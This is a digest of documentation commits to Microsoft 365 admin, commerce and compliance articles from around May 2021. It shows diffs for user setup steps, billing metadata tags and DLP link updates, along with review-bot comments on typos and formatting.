Updates from: 05/01/2021 03:09:46
Category Microsoft Docs article Related commit history on GitHub Change details
admin Add Users https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/admin/add-users/add-users.md
localization_priority: Priority
- M365-subscription-management - Adm_O365_Setup-- Adm_O365_TOC - okr_smb - AdminSurgePortfolio-- manage_licenses search.appverid: - MET150 description: "Learn how to add users and assign licenses to Microsoft 365 at the same time."
The people on your team each need a user account before they can sign in and acc
You must be a global, license, or a user admin to add users and assign licenses. For more information, see [About admin roles](../../admin/add-users/about-admin-roles.md).
-## Watch: Add users in the admin center
+## Add a user in the admin simplified view
+
+If you're seeing this page in the admin center, you're on the **admin simplified view**. Follow the steps below to add a user.
++
+1. Go to the admin center at <https://admin.microsoft.com>.
+2. Select **Create an account for another person**.
+3. On the **Add a user account** page, fill in the first and last name, display name, and username they'll use to sign in.
+4. Add the email address of the user in the **Up to 5 email addresses...** text box. This will make sure the new user gets the information they need to sign into Microsoft 365 services.
+5. Select **Add user** and **Download sign-in info** if you want to save this info.
+
+## Watch: Add users in the dashboard view
> [!VIDEO https://www.microsoft.com/videoplayer/embed/RE1FOfN?autoplay=false] > [!NOTE] > The steps used in the video show a different starting point for adding users, but the remaining steps are the same as the following procedure.
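Review bot: Step 5 of the new simplified-view procedure is ambiguous, because the trailing "if you want to save this info" can be read as applying to both **Add user** and **Download sign-in info**. Suggest splitting it into two sentences, for example "Select **Add user**. To save the sign-in info, select **Download sign-in info**." In step 4, "sign into Microsoft 365 services" should be "sign in to Microsoft 365 services".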
-## Add users one at a time
+## Add users one at a time in the dashboard view
::: moniker range="o365-worldwide"
-1. Go to the admin center at <a href="https://go.microsoft.com/fwlink/p/?linkid=2024339" target="_blank">https://admin.microsoft.com</a>.
+1. Go to the admin center at <https://admin.microsoft.com>.
+2. Go to **Users** > **Active users**, and select **Add a user**.
+3. In the **Set up the basics** pane, fill in the basic user information, and then select **Next**.
+ - **Name** Fill in the first and last name, display name, and username.
+ - **Domain** Choose the domain for the user's account. For example, if the user's username is Jakob, and the domain is contoso.com, they'll sign in by using jakob@contoso.com.
+ - **Password settings** Choose to use the autogenerated password or to create your own strong password for the user.
+ - The user must change their password after 90 days. Or you can choose to **Require this user to change their password when they first sign in**.
+ - Choose whether you want to send the password in email when the user is added.
+4. In the **Assign product licenses** pane, select the location and the appropriate license for the user. If you don't have any licenses available, you can still add a user and buy additional licenses. Expand **Apps** and select or deselect apps to limit the apps the user has a license for. Select **Next**.
+5. In the **Optional settings** pane, expand **Roles** to make this user an admin. Expand **Profile info** to add additional information about the user.
+6. Select **Next**, review your new user's settings, make any changes you like, then select **Finish adding**, then **Close**.
1. Go to the admin center at <a href="https://go.microsoft.com/fwlink/p/?linkid=848041" target="_blank">https://portal.office.de</a>.
admin Sign Up For Office 365 https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/admin/admin-overview/sign-up-for-office-365.md
localization_priority: Normal
- M365-subscription-management - Adm_O365-- Adm_TOC - TRN_SMB - TRN_M365B - OKR_SMB_Videos - okr_SMB - AdminSurgePortfolio
+- commerce_signup
+- PPM_pablom
+ search.appverid: - MET150-- MOE150-- BEA160-- GEA150
-description: "Understand what you need to know before you go through the sign-up process for Office 365. "
+description: "Understand what you need to know before you go through the sign-up process for Office 365."
Last updated : 03/17/2021 # How to sign up - Admin Help
admin Change Address Contact And More https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/admin/manage/change-address-contact-and-more.md
localization_priority: Normal
- M365-subscription-management - Adm_O365-- Adm_TOC-+
+- AdminSurgePortfolio
+- commcerce_billing
+- PPM_jmueller
+ search.appverid:-- BCS160 - MET150-- MOE150-- GEA150 description: "Learn how to make changes to your organization profile, such as organization name, address, phone, technical contact, and email." Last updated : 03/30/2021 # Change your organization's address, technical contact, and more
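Review bot: The added metadata value `commcerce_billing` is misspelled. The other billing articles in this update add `commerce_billing`, so this article will not match them in any grouping or reporting keyed on that value. Suggest correcting it to `commerce_billing`.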
admin Self Service Sign Up https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/admin/misc/self-service-sign-up.md
localization_priority: Normal
- M365-subscription-management - Adm_O365-- Adm_NonTOC - AdminSurgePortfolio - okr_SMB
+- commerce_signup
+- PPM_pablom
+ search.appverid: - MET150 description: "Learn about the Microsoft 365 self-service sign-up and available self-service programs such as Microsoft Power Apps, Microsoft Flow, and Dynamics 365 for Finance." Last updated : 03/17/2021 # Using self-service sign-up in your organization
The following example describes how self-sign up works for a school. The same pr
1. Students and faculty members have school email addresses that indicate they are associated with your institution. For example, the email address jakob@uw.edu may indicate a student at the University of Washington. 2. Students and faculty go to [our web site](https://go.microsoft.com/fwlink/p/?LinkId=536628), and use their email address to sign up for the services that your organization offers, such Microsoft 365 Apps for enterprise. They can also sign up for other free services that we offer. 3. We validate their email address, and then they can start using Microsoft 365, Power BI, or other services right away.
-4. As the business admin, you can see who has signed up for a subscription by selecting the subscription on the **Licensing** page in the Microsoft 365 admin center. This way you can see when there are new or unrecognized licenses for services in your tenant. To control whether users can sign up for self-service subscriptions, use the [Set-MsolCompanySettings](/powershell/module/msonline/set-msolcompanysettings?view=azureadps-1.0) PowerShell cmdlet with the **AllowAdHocSubscriptions** parameter. For more information, see [How do I control self-service settings?](/azure/active-directory/users-groups-roles/directory-self-service-signup#how-do-i-control-self-service-settings)
+4. As the business admin, you can see who has signed up for a subscription by selecting the subscription on the **Licensing** page in the Microsoft 365 admin center. This way you can see when there are new or unrecognized licenses for services in your tenant. To control whether users can sign up for self-service subscriptions, use the [Set-MsolCompanySettings](/powershell/module/msonline/set-msolcompanysettings?view=azureadps-1.0&preserve-view=true) PowerShell cmdlet with the **AllowAdHocSubscriptions** parameter. For more information, see [How do I control self-service settings?](/azure/active-directory/users-groups-roles/directory-self-service-signup#how-do-i-control-self-service-settings)
## Available self-service programs
admin Apply For A Fapiao https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/admin/services-in-china/apply-for-a-fapiao.md
localization_priority: Normal
- M365-subscription-management - Adm_O365-- Adm_NonTOC-- commerce-+
+- AdminSurgePortfolio
+- commerce_billing
+- PPM_jmueller
+ search.appverid: - MET150 - GEA150 description: "Learn how to submit your Fapiao request to the 21Vianet Fapiao management system after making a payment in the Office 365 operated by 21Vianet in China." monikerRange: 'o365-21vianet' Last updated : 03/30/2021 # Apply for a Fapiao for Office 365 operated by 21Vianet
business Security Features https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/business/security-features.md
Advanced features in Microsoft 365 Business Premium are available to help you pr
Your Microsoft 365 Business Premium subscription includes features that help you maintain compliance and regulatory standards. -- **[Overview of data loss prevention policies](../compliance/data-loss-prevention-policies.md)** (DLP).
+- **[Learn about data loss prevention](../compliance/dlp-learn-about-dlp.md))** (DLP).
You can set up DLP to automatically detect sensitive information, like credit card numbers, social security numbers, and so on, to prevent their inadvertent sharing outside your company.
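Review bot: The replacement link on the added line has an extra closing parenthesis, `(../compliance/dlp-learn-about-dlp.md))`, which will render as a stray `)` inside the bold text. Suggest removing one parenthesis. The new link text "Learn about data loss prevention" followed by "(DLP)" also reads less cleanly as a list item than the previous title did. Consider "Data loss prevention (DLP)" as the link text.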
commerce About Registration Numbers https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/commerce/about-registration-numbers.md
- Adm_O365 search.appverid: - MET150
-description: "Learn about registration numbers and under-review notifications when you buy Microsoft products or services."
- okr_SMB - AdminSurgePortfolio-- commerce
+- commerce_purchase
+- PPM_jmueller
+
+description: "Learn about registration numbers and under-review notifications when you buy Microsoft products or services."
Last updated : 03/17/2021 # About registration numbers and under review notifications
commerce Add Storage Space https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/commerce/add-storage-space.md
localization_priority: Normal
- M365-subscription-management - Adm_O365-- Adm_TOC - SPO_Content - MAX_CampaignID - okr_SMB - AdminSurgePortfolio-- commerce
+- commerce_purchase
+- PPM_jmueller
+ search.appverid: - MET150 description: "Learn to add and reduce file storage in your Microsoft 365 subscription. With extra file storage, you can store more content in SharePoint Online and OneDrive." Previously updated : Last updated : 04/02/2021 # Add storage space for your subscription
commerce Change Payment Frequency https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/commerce/billing-and-payments/change-payment-frequency.md
localization_priority: Normal
- M365-subscription-management - Adm_O365-- Adm_TOC-- commerce - TopSMBIssues - okr_SMB - AdminSurgePortfolio
+- commerce_billing
+- PPM_jmueller
+ search.appverid: - MET150 description: "Learn how to change how frequently you're billed for your business subscription." Last updated : 04/02/2021 # Change your billing frequency
commerce Change Your Billing Addresses https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/commerce/billing-and-payments/change-your-billing-addresses.md
- okr_SMB - AdminSurgePortfolio-- commerce
+- commerce_billing
+- PPM_jmueller
+ search.appverid: - MET150 description: "Learn how to update your billing addresses for Microsoft 365 for business. You can also update the email address used to receive billing notifications."- Last updated : 04/07/2021 # Change your billing addresses
commerce Manage Payment Methods https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/commerce/billing-and-payments/manage-payment-methods.md
localization_priority: Priority
- M365-subscription-management - Adm_O365-- Adm_TOC - TopSMBIssues - okr_SMB - AdminSurgePortfolio-- commerce
+- commerce_billing
+- PPM_jmueller
+ search.appverid: - MET150 description: "Learn how to manage your payment methods in the Microsoft 365 admin center." Previously updated : Last updated : 04/02/2021 # Manage payment methods
commerce Mexico Billing Info https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/commerce/billing-and-payments/mexico-billing-info.md
localization_priority: Normal
- M365-subscription-management - Adm_O365-- commerce search.appverid: - MET150 description: "Learn about information specifically for Microsoft 365 for business in Mexico." - AdminSurgePortfolio-- Commerce
+- commerce_billing
+- PPM_jmueller
+ monikerRange: 'o365-worldwide' Last updated : 11/20/2020 # Billing information for Microsoft 365 for business in Mexico
commerce Buy Or Edit An Add On https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/commerce/buy-or-edit-an-add-on.md
- Adm_O365 search.appverid: - MET150
-description: "Learn how to buy and manage add-ons for your Microsoft 365 for business subscription."
- okr_SMB - AdminSurgePortfolio-- Commerce
+- commerce_purchase
+- PPM_jmueller
+
+description: "Learn how to buy and manage add-ons for your Microsoft 365 for business subscription."
Last updated : 04/02/2021 # Buy or manage add-ons
commerce Close Your Account https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/commerce/close-your-account.md
localization_priority: Normal -- commerce
+- M365-subscription-management
+- Adm_O365
- AdminSurgePortfolio - fwlink 2133922 to Delete subscription heading
+- commerce_subscription
+- PPM_jmueller
+ search.appverid: - MET150 description: "Learn how to close your account with Microsoft." Last updated : 04/02/2021 # Close your account
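Review bot: The added value `commerce_subscription` is singular here, while the other subscription articles in this update (manage-partners.md, cancel-your-subscription.md, change-plans-manually.md) add `commerce_subscriptions`. Suggest using the plural form so the article is tagged consistently with the rest of the set.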
Delete all users except for one global administrator. The global administrator c
If users are synchronized from on-premises, first turn off sync, then delete the users in the cloud directory by using the Azure portal or Azure PowerShell cmdlets.
-To delete users, see <a href="/office365/admin/add-users/delete-a-user?view=o365-worldwide#user-management-admin-delete-one-or-more-users-from-office-365">User management admin: Delete one or more users</a>.
+To delete users, see [User management admin: Delete one or more users](../admin/add-users/delete-a-user.md#user-management-admin-delete-one-or-more-users-from-office-365).
-You can also use the <a href="https://docs.microsoft.com/powershell/module/msonline/remove-msoluser">Remove-MsolUser</a> PowerShell cmdlet to delete users in bulk.
+You can also use the [Remove-MsolUser](/powershell/module/msonline/remove-msoluser) PowerShell cmdlet to delete users in bulk.
-If your organization uses Active Directory that synchronizes with Microsoft Azure Active Directory (Azure AD), delete the user account from Active Directory, instead. For instructions, see <a href="/azure/active-directory/users-groups-roles/users-bulk-delete">Bulk delete users in Azure Active Directory</a>.
+If your organization uses Active Directory that synchronizes with Microsoft Azure Active Directory (Azure AD), delete the user account from Active Directory, instead. For instructions, see [Bulk delete users in Azure Active Directory](/azure/active-directory/users-groups-roles/users-bulk-delete).
## Step 2: Cancel all active subscriptions
If your organization uses Active Directory that synchronizes with Microsoft Azur
6. For each disabled subscription, repeat steps 3 through 5 until all subscriptions are deleted. > [!NOTE]
-> If you're unable to immediately delete a disabled subscription, <a href="/microsoft-365/Admin/contact-support-for-business-products" target="_blank">contact support</a>
+> If you're unable to immediately delete a disabled subscription, [contact support](../admin/contact-support-for-business-products.md).
## Step 4: Disable multi-factor authentication
If your organization uses Active Directory that synchronizes with Microsoft Azur
3. Choose **Multi-factor authentication**. 4. On the multi-factor authentication page, disable all accounts except for the global admin account that you're currently using.
-You can also <a href="/azure/active-directory/authentication/howto-mfa-userstates#change-state-using-powershell">use PowerShell to disable multi-factor authentication for multiple users</a>.
+You can also [use PowerShell to disable multi-factor authentication for multiple users](/azure/active-directory/authentication/howto-mfa-userstates#change-state-using-powershell).
+ ## Step 5: Delete the directory in Azure Active Directory
commerce Enter Your Product Key https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/commerce/enter-your-product-key.md
localization_priority: Normal
- M365-subscription-management - Adm_O365-- commerce-- Adm_NonTOC search.appverid: - MET150
-description: "Learn how to redeem a Microsoft 365 Business Standard product key purchased at a retail store."
- okr_SMB - AdminSurgePortfolio
+- commerce_purchase
+- PPM_jmueller
+
+description: "Learn how to redeem a Microsoft 365 Business Standard product key purchased at a retail store."
Last updated : 11/13/2020 # Enter your product key for Microsoft 365 Business Standard
commerce Manage Third Party App Licenses https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/commerce/licenses/manage-third-party-app-licenses.md
+
+ Title: "Manage third-party app licenses in the Microsoft 365 admin center"
+f1.keywords:
+- NOCSH
+++
+audience: Admin
++
+localization_priority: Normal
+
+- M365-subscription-management
+- Adm_O365
+
+- AdminSurgePortfolio
+- commerce_licensing
+
+search.appverid:
+- MET150
+description: "Learn how to manage licenses for third-party apps in the Microsoft 365 admin center."
++
+# Manage third-party app licenses in the Microsoft 365 admin center
+
+A third-party app is an app that you buy from a software vendor other than Microsoft.
+
+## Before you begin
+
+You must be a Global, License, or User admin to assign licenses. For more information, see [About admin roles](../../admin/add-users/about-admin-roles.md).
+
+## Assign third-party app licenses to users or groups
+
+1. In the Microsoft 365 admin center, go to the **Billing** > <a href="https://go.microsoft.com/fwlink/p/?linkid=842264" target="_blank">Licenses</a> page.
+2. Select the app that you want to assign licenses for.
+3. On the license details page, select **Assign licenses**.
+4. In the **Assign licenses** pane, begin typing the name of a user or group, and then choose it from the results to add it to the list.
+5. When you're finished, select **Assign**, then select **Close**.
+
+## Unassign third-party app licenses from users or groups
+
+1. In the admin center, **Billing** > <a href="https://go.microsoft.com/fwlink/p/?linkid=842264" target="_blank">Licenses</a> page.
+2. Select the app that you want to unassign licenses for.
+3. On the license details page, select the users and groups to remove licenses from, then select Unassign licenses.
+4. In the dialog box, confirm that you want to remove the licenses, then select Unassign.
+
+## Add or remove third-party app licenses for your account
+
+Third-party app licenses are managed by the app vendor. Contact the vendor to add or remove licenses for your account.
+
+## Next steps
+
+Depending on the third-party app that you bought, your next step might be to install the app into your organizationΓÇÖs environment. Installing the app makes it available for your users. Use the following steps to install a third-party app to your environment.
+
+1. In the admin center, **Billing** > <a href="https://go.microsoft.com/fwlink/p/?linkid=842264" target="_blank">Licenses</a> page.
+2. Select the app that you want to install into your account.
+3. On the license details page, select Install this product. You are redirected to a different platform site where you install the app into your environment.
+
+## Related content
+
+[Assign licenses to users](../../admin/manage/assign-licenses-to-users.md) (article) \
+[Unassign licenses from users](../../admin/manage/remove-licenses-from-users.md) (article)
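Review bot: Step 1 under "Unassign third-party app licenses" and under "Next steps" is missing its verb ("In the admin center, **Billing** > Licenses page."). The first procedure has the complete wording "go to the **Billing** > Licenses page", so suggest reusing it. UI labels are also formatted inconsistently: **Assign licenses** and **Assign** are bold in the first procedure, but "Unassign licenses", "Unassign" and "Install this product" are plain text in the later steps. The new file uses raw `<a href=... target="_blank">` anchors for the Licenses link, while other articles in this same update convert HTML anchors to Markdown links, so consider Markdown here as well.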
commerce Manage Billing Accounts https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/commerce/manage-billing-accounts.md
localization_priority: Normal -- commerce -
+- M365-subscription-management
+- Adm_O365
+
+- AdminSurgePortfolio
+- commerce_billing
+- PPM_jmueller
+ search.appverid: - MET150 description: "Learn about billing accounts and how to manage them." Last updated : 03/17/2021 # Manage billing accounts
commerce Manage Partners https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/commerce/manage-partners.md
localization_priority: Normal -- commerce-
+- M365-subscription-management
+- Adm_O365
+
+- AdminSurgePortfolio
+- commerce_subscriptions
+- PPM_jmueller
+ search.appverid: - MET150 description: "Learn how to work with Microsoft-certified solution providers (partners) to purchase and manage products and services for your organization or school." Last updated : 04/13/2021 # Manage partner relationships
commerce Purchases From Microsoft Open https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/commerce/purchases-from-microsoft-open.md
localization_priority: Normal
- M365-subscription-management - Adm_O365-- Adm_NonTOC-- commerce-+
+- AdminSurgePortfolio
+- commerce_purchase
+- PPM_jmueller
+ search.appverid:-- BCS160 - MET150-- MOE150-- BEA160 description: "Learn how to activate, renew, or add licenses to an Microsoft 365 for business subscription." Last updated : 10/21/2020 # Enter your product key purchased from Microsoft Open
commerce Back Up Data Before Switching Plans https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/commerce/subscriptions/back-up-data-before-switching-plans.md
localization_priority: Normal
- M365-subscription-management - Adm_O365-- commerce-- Adm_TOC-+
+- AdminSurgePortfolio
+- commerce_subscriptions
+- PPM_jmueller
+ search.appverid: - BCS160 - MET150 - MOE150 - BEA160 description: "Backup Outlook, OneDrive, Yammer, and SharePoint content before changing Microsoft 365 plans." Last updated : 03/17/2021 # Back up data before switching Microsoft 365 for business plans
commerce Cancel Your Subscription https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/commerce/subscriptions/cancel-your-subscription.md
localization_priority: Priority
- M365-subscription-management - Adm_O365-- Adm_TOC - AdminSurgePortfolio-- commerce
+- commerce_subscriptions
+- PPM_jmueller
+ search.appverid: - MET150 description: "Learn how to cancel your Microsoft 365 for business trial or paid subscription." Previously updated : Last updated : 04/08/2021 # Cancel your subscription
commerce Change Plans Manually https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/commerce/subscriptions/change-plans-manually.md
localization_priority: Normal
- M365-subscription-management - Adm_O365-- commerce-- Adm_NonTOC-+
+- AdminSurgePortfolio
+- commerce_subscriptions
+- PPM_jmueller
+ search.appverid:-- BCS160 - MET150-- MOE150-- BEA160 description: "Change subscriptions manually by buying a new subscription and ensuring that both the subscriptions are listed and active." Last updated : 03/17/2021 # Change plans manually
commerce Important Information E4 https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/commerce/subscriptions/important-information-e4.md
localization_priority: Normal
- M365-subscription-management - Adm_O365-- Adm_NonTOC-- commerce-+
+- customer-email
+- commerce_subscriptions
+- PPM_jmueller
+ search.appverid: - MET150+ description: "Important information about upgrading or changing plans for customers with an Office 365 E4 subscription." Last updated 08/14/2020- # Important information for Office 365 E4 customers
commerce Manage Self Service Signup Subscriptions https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/commerce/subscriptions/manage-self-service-signup-subscriptions.md
localization_priority: Normal
- M365-subscription-management - Adm_O365-- commerce-- Adm_NonTOC-+
+- AdminSurgePortfolio
+- commerce_subscriptions
+- PPM_jmueller
+ search.appverid: - MET150 description: "Learn how to manage free self-service sign-up subscriptions for your organization." Last updated : 03/17/2021 # Manage self-service sign-up subscriptions
compliance Apply Retention Labels Automatically https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/apply-retention-labels-automatically.md
Some settings can't be changed after the label or policy is created and saved, w
### Deleting retention labels
-You can delete retention labels that aren't currently included in any retention label policies, that aren't configured for event-based retention, or mark items as regulatory records. The ability to delete retention labels that mark items as records is currently rolling out in preview.
+You can delete retention labels that aren't currently included in any retention label policies, that aren't configured for event-based retention, or mark items as regulatory records.
For retention labels that you can delete, if they have been applied to items, the deletion fails and you see a link to content explorer to identify the labeled items.
compliance Classifier Learn About https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/classifier-learn-about.md
This category of classification mechanisms include finding content by:
- Recognizing an item because it's a variation on a template [(document finger printing)](document-fingerprinting.md). - Using the presence of exact strings [(exact data match)](create-custom-sensitive-information-types-with-exact-data-match-based-classification.md).
-Sensitivity and retention labels can then be automatically applied to make the content available for use in [data loss prevention (DLP)](data-loss-prevention-policies.md) and [auto-apply polices for retention labels](apply-retention-labels-automatically.md).
+Sensitivity and retention labels can then be automatically applied to make the content available for use in [Learn about data loss prevention](dlp-learn-about-dlp.md)) and [auto-apply polices for retention labels](apply-retention-labels-automatically.md).
## Classifiers
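Review bot: The added line has an extra closing parenthesis after the new link, `(dlp-learn-about-dlp.md))`, which will render as a stray `)` in the sentence. Swapping in the target article's title as link text also breaks the grammar: "available for use in Learn about data loss prevention and auto-apply polices". Suggest keeping "data loss prevention (DLP)" as the link text and changing only the target. While this line is being edited, "polices" should be "policies".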
You can help improve the accuracy of all custom classifiers and some pre-trained
## See also - [Retention labels](retention.md)-- [Data loss prevention (DLP)](data-loss-prevention-policies.md)
+- [Learn about data loss prevention](dlp-learn-about-dlp.md)
- [Sensitivity labels](sensitivity-labels.md) - [Sensitive information type entity definitions](sensitive-information-type-entity-definitions.md) - [Document finger printing](document-fingerprinting.md)
compliance Communication Compliance Feature Reference https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/communication-compliance-feature-reference.md
By default, the **Direction is** condition is displayed and can't be removed. Co
### Sensitive information types
-You have the option of including sensitive information types as part of your communication compliance policy. Sensitive information types are either pre-defined or custom data types that can help identify and protect credit card numbers, bank account numbers, passport numbers, and more. As part of [data loss prevention (DLP)](data-loss-prevention-policies.md), the sensitive information configuration can use patterns, character proximity, confidence levels, and even custom data types to help identify and flag content that may be sensitive. The default sensitive information types are:
+You have the option of including sensitive information types as part of your communication compliance policy. Sensitive information types are either pre-defined or custom data types that can help identify and protect credit card numbers, bank account numbers, passport numbers, and more. As part of [Learn about data loss prevention](dlp-learn-about-dlp.md), the sensitive information configuration can use patterns, character proximity, confidence levels, and even custom data types to help identify and flag content that may be sensitive. The default sensitive information types are:
- Financial - Medical and health
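Review bot: The new link text does not fit the sentence on the added line: "As part of Learn about data loss prevention, the sensitive information configuration can use patterns..." Suggest keeping the original link text "data loss prevention (DLP)" and updating only the link target to `dlp-learn-about-dlp.md`, which also preserves the definition of the DLP abbreviation at this point.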
compliance Compliance Quick Tasks https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/compliance-quick-tasks.md
For step-by-step guidance to define custom sensitive information types, see [Cre
### Prevent data loss
-[Data loss prevention (DLP) policies](data-loss-prevention-policies.md) allow you to identify, monitor, and automatically protect sensitive information across your Microsoft 365 organization. Use DLP policies to identify sensitive items across Microsoft services, prevent the accidental sharing of sensitive items, and help users learn how to stay compliant without interrupting their workflow.
+[Data loss prevention (DLP) policies](dlp-learn-about-dlp.md) allow you to identify, monitor, and automatically protect sensitive information across your Microsoft 365 organization. Use DLP policies to identify sensitive items across Microsoft services, prevent the accidental sharing of sensitive items, and help users learn how to stay compliant without interrupting their workflow.
For step-by-step guidance to configure DLP policies, [Create, test, and tune a DLP policy](create-test-tune-dlp-policy.md). For data loss management licensing information, see [Microsoft 365 licensing guidance for security & compliance](/office365/servicedescriptions/microsoft-365-service-descriptions/microsoft-365-tenantlevel-services-licensing-guidance/microsoft-365-security-compliance-licensing-guidance#office-365-data-loss-prevention-for-exchange-online-sharepoint-online-and-onedrive-for-business).
compliance Create A Custom Sensitive Information Type In Scc Powershell https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/create-a-custom-sensitive-information-type-in-scc-powershell.md
You can copy this markup, save it as an XSD file, and use it to validate your ru
## More information -- [Overview of data loss prevention policies](data-loss-prevention-policies.md)
+- [Learn about data loss prevention](dlp-learn-about-dlp.md)
- [Sensitive information type entity definitions](sensitive-information-type-entity-definitions.md)
compliance Create A Dlp Policy From A Template https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/create-a-dlp-policy-from-a-template.md
In addition, you can turn off each rule individually by editing the policy and t
## More information -- [Overview of data loss prevention policies](data-loss-prevention-policies.md)
-
+- [Learn about data loss prevention](dlp-learn-about-dlp.md)
- [Send notifications and show policy tips for DLP policies](use-notifications-and-policy-tips.md)
-
- [Create a DLP policy to protect documents with FCI or other properties](protect-documents-that-have-fci-or-other-properties.md)
-
- [What the DLP policy templates include](what-the-dlp-policy-templates-include.md)
-
- [Sensitive information type entity definitions](sensitive-information-type-entity-definitions.md)
-
-
compliance Create Apply Retention Labels https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/create-apply-retention-labels.md
Some settings can't be changed after the label or policy is created and saved, w
### Deleting retention labels
-You can delete retention labels that aren't currently included in any retention label policies, that aren't configured for event-based retention, or mark items as regulatory records. The ability to delete retention labels that mark items as records is currently rolling out in preview.
+You can delete retention labels that aren't currently included in any retention label policies, that aren't configured for event-based retention, or mark items as regulatory records.
For retention labels that you can delete, if they have been applied to items, the deletion fails and you see a link to content explorer to identify the labeled items.
compliance Create Custom Sensitive Information Types With Exact Data Match Based Classification https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/create-custom-sensitive-information-types-with-exact-data-match-based-classification.md
But what if you wanted a custom sensitive information type (SIT) that uses exact
![EDM-based classification](../media/EDMClassification.png)
-EDM-based classification enables you to create custom sensitive information types that refer to exact values in a database of sensitive information. The database can be refreshed daily, and contain up to 100 million rows of data. So as employees, patients, or clients come and go, and records change, your custom sensitive information types remain current and applicable. And, you can use EDM-based classification with policies, such as [data loss prevention policies](data-loss-prevention-policies.md) (DLP) or [Microsoft Cloud App Security file policies](/cloud-app-security/data-protection-policies).
+EDM-based classification enables you to create custom sensitive information types that refer to exact values in a database of sensitive information. The database can be refreshed daily, and contain up to 100 million rows of data. So as employees, patients, or clients come and go, and records change, your custom sensitive information types remain current and applicable. And, you can use EDM-based classification with policies, such as [data loss prevention policies](dlp-learn-about-dlp.md) or [Microsoft Cloud App Security file policies](/cloud-app-security/data-protection-policies).
> [!NOTE] > Microsoft 365 Information Protection supports in preview double byte character set languages for:
EDM sensitive information types for following scenarios are currently in develop
- [Sensitive information type-entity definitions](sensitive-information-type-entity-definitions.md) - [Learn about sensitive information types](sensitive-information-type-learn-about.md)-- [Overview of DLP policies](data-loss-prevention-policies.md)
+- [Learn about data loss prevention](dlp-learn-about-dlp.md)
- [Microsoft Cloud App Security](/cloud-app-security) - [New-DlpEdmSchema](/powershell/module/exchange/new-dlpedmschema) - [Modify Exact Data Match schema to use configurable match](sit-modify-edm-schema-configurable-match.md)
compliance Customize A Built In Sensitive Information Type https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/customize-a-built-in-sensitive-information-type.md
These are the definitions for the terms you encountered during this procedure.
## For more information - [Sensitive information type entity definitions](sensitive-information-type-entity-definitions.md)
-
- [Create a custom sensitive information type](create-a-custom-sensitive-information-type.md)
-
-- [Overview of data loss prevention policies](data-loss-prevention-policies.md)
+- [Learn about data loss prevention](dlp-learn-about-dlp.md)
compliance Data Classification Activity Explorer https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/data-classification-activity-explorer.md
Activity explorer also gathers **DLP policy matches** events from Exchange Onlin
- copied to network share - accessed by unallowed app
-The value of understanding what actions are being taken with your sensitive labeled content is that you can see if the controls that you have already put into place, such as [data loss prevention policies](data-loss-prevention-policies.md) are effective or not. If not, or if you discover something unexpected, such as a large number of items that are labeled `highly confidential` and are downgraded `general`, you can manage your various policies and take new actions to restrict the undesired behavior.
+The value of understanding what actions are being taken with your sensitive labeled content is that you can see if the controls that you have already put into place, such as [data loss prevention](dlp-learn-about-dlp.md) are effective or not. If not, or if you discover something unexpected, such as a large number of items that are labeled `highly confidential` and are downgraded `general`, you can manage your various policies and take new actions to restrict the undesired behavior.
> [!NOTE] > Activity explorer doesn't currently monitor retention activities for Exchange Online.
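Review bot: Shortening the link text to "data loss prevention" on the changed line leaves "the controls that you have already put into place, such as data loss prevention are effective or not", where the example is no longer something you put in place. Keep "data loss prevention policies" as the link text with the new target, and close the aside with a comma after the link. The same line still has "downgraded `general`", which is missing "to".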
compliance Data Classification Content Explorer https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/data-classification-content-explorer.md
Content explorer shows a current snapshot of the items that have a sensitivity l
### Sensitive information types
-A [DLP policy](data-loss-prevention-policies.md) can help protect sensitive information, which is defined as a **sensitive information type**. Microsoft 365 includes [definitions for many common sensitive information types](sensitive-information-type-entity-definitions.md) from across many different regions that are ready for you to use. For example, a credit card number, bank account numbers, national ID numbers, and Windows Live ID service numbers.
+A [DLP policy](dlp-learn-about-dlp.md) can help protect sensitive information, which is defined as a **sensitive information type**. Microsoft 365 includes [definitions for many common sensitive information types](sensitive-information-type-entity-definitions.md) from across many different regions that are ready for you to use. For example, a credit card number, bank account numbers, national ID numbers, and Windows Live ID service numbers.
> [!NOTE] > Content explorer doesn't currently scan for sensitive information types in Exchange Online.
You can search on:
